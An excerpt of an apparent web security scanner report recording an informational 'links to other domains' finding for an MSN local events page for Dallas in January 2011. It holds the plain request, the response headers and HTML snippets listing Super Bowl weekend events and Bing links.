http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP
http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP
http://www.bing.com/events/search?q=Harlem Globetrotters&p1=[Events+source="vertical"+qzeventid="z149225805"]&form=MSNLAP
http://www.bing.com/events/search?q=Mamma Mia!&p1=[Events+source="vertical"+qzeventid="z129219765"]&form=MSNLAP
http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP
http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP
http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP
http://www.bing.com/getimage?q=FEV3_2843a0f4fa9b85c7b077cec9a90921c4_1&wf=Genimage
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406229&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies-events.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=29617873f99d4f4aadb0f805a060bc63; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=89FBA17A031A48A3A7AF8A631C05BD5B; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406229&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
</span><a href="http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207" class="attr">Find more events</a>
...[SNIP]...
<div class="events"><a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP" class="featuredlink">
<img alt="Dane Cook" height="100" width="100" src="http://www.bing.com//getimage?q=FEV3_2843a0f4fa9b85c7b077cec9a90921c4_1&wf=Genimage" />
</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP" title="Dane Cook">Dane Cook</a>
...[SNIP]...
<p>On the heels of one of the most successful standup tours in recent history, comedian Dane Cook will ...<a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP">more</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP" title="2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks">2011 Dallas Super Bowl Weekend - Fantasy Party - ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Mamma Mia!&p1=[Events+source="vertical"+qzeventid="z129219765"]&form=MSNLAP" title="Mamma Mia!">Mamma Mia!</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP" title="NFL Experience">NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Harlem Globetrotters&p1=[Events+source="vertical"+qzeventid="z149225805"]&form=MSNLAP" title="Harlem Globetrotters">Harlem Globetrotters</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP" title="2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta">2011 Super Bowl XLV Weekend Party - Hosted by the ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP" title="Penthouse Magazine "Super Party 2011" Super Bowl event">Penthouse Magazine "Super Party 2011" Super Bowl ...</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP" title="NFLX After Dark at The NFL Experience">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP" title="P. Diddy's Super Bowl Grand Finale Party">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=12th Annual Superbowl Gospel Celebration&p1=[Events+source="vertical"+qzeventid="z144523185"]&form=MSNLAP" title="12th Annual Superbowl Gospel Celebration">12th Annual Superbowl Gospel Celebration</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP">Arts & crafts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP">Education & campus</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP">Performing arts</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP">Business & tech</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP">Fairs & festivals</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP">Shopping</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP">Community</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP">Food & dining</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP">Sports & outdoors</a>
...[SNIP]...
<li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP">Dance</a></li><li><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP">Music</a></li><li class="last"><a href="http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP">Visual arts</a>
...[SNIP]...
<a href="http://movies.msn.com/Movies/movie.aspx?m=2277707&mp=m" title="The Mechanic"><img alt="The Mechanic" src="http://entimg.s-msn.com/i/CS/088884h1.jpg" width="130" height="190" /></a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP">Dane Cook</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP">Penthouse Magazine "Super Party 2011" Super Bowl event</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP">P. Diddy's Super Bowl Grand Finale Party</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false">Feedback</a>
...[SNIP]...

22.122. http://local.redacted/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/movies-events.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/movies-events.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://entimg.s-redacted/i/CS/088884h1.jpg
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207
http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP
http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c500"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c600"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c700"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c800"]&form=MSNLAP
http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP
http://www.bing.com/events/search?q=Dinosaurs Unearthed&p1=[Events+source="vertical"+qzeventid="z148859065"]&form=MSNLAP
http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP
http://www.bing.com/events/search?q=Harlem Globetrotters&p1=[Events+source="vertical"+qzeventid="z149225805"]&form=MSNLAP
http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP
http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP
http://www.bing.com/events/search?q=O Brother, Werewolf Art Thou?&p1=[Events+source="vertical"+qzeventid="z158259485"]&form=MSNLAP
http://www.bing.com/events/search?q=P. Diddy's Super Bowl Grand Finale Party&p1=[Events+source="vertical"+qzeventid="z156625485"]&form=MSNLAP
http://www.bing.com/events/search?q=Penthouse Magazine "Super Party 2011" Super Bowl event&p1=[Events+source="vertical"+qzeventid="z162078765"]&form=MSNLAP
http://www.bing.com/events/search?q=Private NFL Experience Courtesy of PepsiCo and Kroger&p1=[Events+source="vertical"+qzeventid="z161984965"]&form=MSNLAP
http://www.bing.com/getimage?q=FEV3_9cc8b157ca6c8d0d313f3bdedcd4389c_1&wf=Genimage
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344863&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=VeakLjTh&resize=false
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies-events.aspx?zip=75207&q=75207 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1f11c957e6a04e84b207afdf9942c489; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9B9348005D1E4BCE91C8A16ABA3EA768; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:43 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 59632

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344863&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fmovies-events.aspx%3Fzip%3D75207%26q%3D75207&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75207&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75207&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75207&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75207">Yellow pages</a>
...[SNIP]...
</span><a href="http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207" class="attr">Find more events</a>
...[SNIP]...
<div class="events"><a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP" class="featuredlink">
<img alt="50th Anniversary Celebration presented by Texas Ballet Theater" height="100" width="100" src="http://www.bing.com//getimage?q=FEV3_9cc8b157ca6c8d0d313f3bdedcd4389c_1&wf=Genimage" />
</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP" title="50th Anniversary Celebration presented by Texas Ballet Theater">50th Anniversary Celebration presented by Texas ...</a>
...[SNIP]...
<p>STEVENSONS FOUR LAST SONGSEvoking both passion and empathy, Ben Stevensons emotional interpretation ...<a href="http://www.bing.com/events/search?q=50th Anniversary Celebration presented by Texas Ballet Theater&p1=[Events+source="vertical"+qzeventid="z130863645"]&form=MSNLAP">more</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=Dane Cook&p1=[Events+source="vertical"+qzeventid="z149220025"]&form=MSNLAP" title="Dane Cook">Dane Cook</a>
...[SNIP]...
<h3>
<a href="http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP" title="NFL Experience">NFL Experience</a>
...[SNIP]...
<h3>
